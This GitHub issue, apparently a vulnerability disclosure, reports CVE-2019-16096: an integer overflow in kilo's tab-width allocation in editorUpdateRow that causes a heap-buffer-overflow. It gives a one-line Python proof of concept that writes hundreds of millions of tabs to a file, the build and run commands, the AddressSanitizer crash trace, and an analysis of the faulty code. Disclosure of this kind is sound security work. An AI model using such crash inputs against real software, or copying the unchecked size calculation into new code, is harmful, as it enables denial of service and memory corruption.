Headline
CVE-2019-16096: Integer Overflow && heap-buffer-overflow in kilo.c · Issue #60 · antirez/kilo
Kilo 0.0.1 has a heap-based buffer overflow because there is an integer overflow in a calculation involving the number of tabs in one row.
There is a heap overflow caused by integer overflow in kilo.c.
POC:
python -c "print '\t'*477218598" > ./exp
In command line:
make CC="clang-4.0 -fsanitize=address"
./kilo ./exp
Output:
=================================================================
==18601==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x608000000077 at pc 0x00000050f641 bp 0x7ffd0126fe50 sp 0x7ffd0126fe48
WRITE of size 1 at 0x608000000077 thread T0
#0 0x50f640 (/home/kirin/kilo/kilo+0x50f640)
#1 0x50fde0 (/home/kirin/kilo/kilo+0x50fde0)
#2 0x511ae0 (/home/kirin/kilo/kilo+0x511ae0)
#3 0x514833 (/home/kirin/kilo/kilo+0x514833)
#4 0x7f99a53a0b96 (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#5 0x41c339 (/home/kirin/kilo/kilo+0x41c339)
0x608000000077 is located 0 bytes to the right of 87-byte region [0x608000000020,0x608000000077)
allocated by thread T0 here:
#0 0x4d1990 (/home/kirin/kilo/kilo+0x4d1990)
#1 0x50f45e (/home/kirin/kilo/kilo+0x50f45e)
#2 0x50fde0 (/home/kirin/kilo/kilo+0x50fde0)
#3 0x511ae0 (/home/kirin/kilo/kilo+0x511ae0)
#4 0x514833 (/home/kirin/kilo/kilo+0x514833)
#5 0x7f99a53a0b96 (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/kirin/kilo/kilo+0x50f640)
Shadow bytes around the buggy address:
0x0c107fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c107fff8000: fa fa fa fa 00 00 00 00 00 00 00 00 00 00[07]fa
0x0c107fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c107fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c107fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c107fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c107fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==18601==ABORTING
Analyze:
There is an integer overflow in function editorUpdateRow:
for (j = 0; j < row->size; j++)
if (row->chars[j] == TAB) tabs++;
row->render = malloc(row->size + tabs*8 + nonprint*9 + 1);
idx = 0;
for (j = 0; j < row->size; j++) {
if (row->chars[j] == TAB) {
row->render[idx++] = ' ';
......
The space size being malloc will be calculated based on the number of TABs in one row.
When the number of TAB is too big,it will lead to Integer Overflow. And it will lead to heap-buffer-overflow finally.